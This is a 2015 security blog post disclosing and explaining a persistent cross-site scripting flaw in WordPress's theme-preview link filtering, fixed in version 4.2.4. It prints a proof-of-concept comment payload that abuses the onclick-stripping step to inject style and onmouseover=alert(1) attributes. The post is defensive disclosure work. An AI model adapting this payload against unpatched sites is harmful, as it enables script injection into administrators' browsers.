• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Persistent XSS Vulnerability in WordPress Explained

August 11, 2015Marc-Alexandre Montpas

Security Risk: Dangerous

Exploitation Level: Easy

DREAD Score: 6/10

Vulnerability: Persistent XSS

Patched Version: 4.2.4

FacebookTwitterSubscribe

Last week the WordPress team released a patch that fixed 6 security vulnerabilities. Of the six, you’ll find one  that we identified a few months back.

Vulnerability Disclosure Timeline:
May 6th, 2015 – Initial report to WordPress security team
May 8th, 2015 – WordPress security team confirming receipt of the report
July 23th, 2015 – WordPress 4.2.3 released, not fixing the issue
July 24th, 2015 – WordPress security team confirming it will be fixed on the next security release
August 4th, 2015 – Patch made public with the release of WordPress 4.2.4

Technical Details

The bug comes from the preview_theme() function, it is used by WordPress to temporarily preview what a specific theme will look like. It is hooked to the setup_theme action hook, which gets executed every time a theme is to be displayed.

The preview_theme() function
The preview_theme() function

As you can see from the above screenshot, if a logged-in administrator visits one of the site’s pages and uses a few additional $_GET parameters (Which can happen, for example, if he clicks on a malicious link beforehand), this function will set preview_theme_ob_filter as ob_start‘s callback function.

The preview_theme_ob_filter callback function
The preview_theme_ob_filter callback function

Once ob_start() has gathered all of the page’s content, it will call preview_theme_ob_filter() to grab all HTML links and filter them using the preview_theme_ob_filter_callback function.

The preview_theme_ob_filter_callback function
The preview_theme_ob_filter_callback function

Which will, among other things, remove onclick=” event handlers from the link tags.

Where is the Issue?

The problem occurs when preview_theme_ob_filter_callback removes the onclick=” handlers as it could be used to actually insert new tag attributes to the HTML link by sending a tag similar to the following in a post comment:

<a href='/wp-admin/' title="onclick='" Title='" style="position:absolute;top:0;left:0;width:100%;height:100%;display:block;" onmouseover=alert(1)//'>Test</a>

Where the part in bold is the one that will get removed, accidentally inserting our style and onmouseover attributes, which will print the following link tag in the administrator’s browser:

<a href='/wp-admin/' title="" style="position:absolute;top:0;left:0;width:100%;height:100%;display:block;" onmouseover=alert(1)//'>Test</a>

This bypasses their filters that were in place to disallow javascript from being executed.

Updates Are Out, Ensure You Don’t Miss Them

If your site supports automatic updates, chances are it’s already been patched. If it’s disabled, you’ll want to manually update at your earliest convenience. We also recommend investing in a technology that can help proactively protect against vulnerabilities like the ones recently patch, something like a Website Firewall (WAF).

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, WordPress SecurityTags: XSS

About Marc-Alexandre Montpas

Marc-Alexandre Montpas is Sucuri’s Senior Security Analyst who joined the company in 2014. Marc’s main responsibilities include reversing security patches and scavenging vulnerabilities, old and new. His professional experience covers eight years of finding bugs in open-source software. When Marc isn’t breaking things, you might find him participating in a hacking CTF competition. Connect with him on Twitter.

Reader Interactions

Comments

  1. Sinan İŞLER

    August 11, 2015

    Problem is wordpress security team is not enough. Before release they should find those bugs or vulnerabilities. But they are not making it because team is not enough. WP Security team must grow.

  2. Joe Barrett

    September 14, 2015

    So this has to be done by an admin?

  3. Anonymous

    November 24, 2016

    alert(XSS)

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.